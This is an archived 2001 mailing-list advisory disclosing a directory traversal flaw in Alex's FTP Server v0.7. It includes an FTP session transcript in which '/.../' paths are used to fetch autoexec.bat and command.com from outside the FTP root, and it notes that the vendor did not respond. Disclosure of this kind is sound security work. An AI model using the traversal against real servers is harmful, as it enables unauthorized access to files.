OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Sat Apr 28 2001 - 18:52:34 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in Alex's FTP Server

        Overview

    Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net.
    Vulnerabilities exist which allow a user to break out of the ftp root.

        Details

    The following is an illustration of the problem. An ftp root of
    'c:\directory\directory' was used:

    Connected to xxxxxxxxxx.rh.rit.edu.
    220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Enter PASS command
    Password:
    230 Logged in
    ftp> get /.../autoexec.bat
    200 Port command okay
    150 Opening data connection for retr "/.../autoexec.bat"
    226 Transfer complete
    ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
    ftp> cd ...
    257 "/.../" is current directory
    ftp> get command.com
    200 Port command okay
    150 Opening data connection for retr "/.../command.com"
    226 Transfer complete
    ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
    ftp>

        Solution

    No quick fix is possible.

        Vendor Status

    Alex Linde was contacted via <alex.lindemagic4.com> on
    Friday, April 20, 2001. No reply was received.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    EQcZaZRY8qHbXEoNyX08XELi9dxKdjm2FqldEP7+Sl5CfDejO0PaPKe/uBYxHXEnkM2u
    44EjodbwrUqAF7M64TA8mDMqpuUwx2NnDlCkvbLMMe5pbVUER/tFD2R4WdD/94j/vtU6
    vLq31tg7Z3jKDgOasR3q9RUb9zsLWjN01FGjSwBQIy2pP+jBaK6Edt7O5oSU1OisSAbH
    9IJF/nx9PovvNSqUqsmz/nbywYuN/CZTURgRfw584aKpidxKB+zrWrmq+wf/WzXxAooI
    W3J7tpHQV2+Osu/f+w5HkS2yc2XWo6gcdAjOySGiA71OL18BLEF6avPFnKfUpFsE4NQ9
    vVuYaI86jMyPlnJd2Rg9HYxxnU80Uu3s8ZLAIwLflbRqyDHk9P4Ivus5hQd0EDs5cjyE
    ALYP9twX/Q86/5fz7qXFR/pJv6kmFr0eOKZdv1zOFES6eVYfdyJeLjhqbTa32BI/88l4
    ywYMSBgRmg7W3eWWcs+FnGbzmMNX7sPUv9m5vIZjPtf/
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com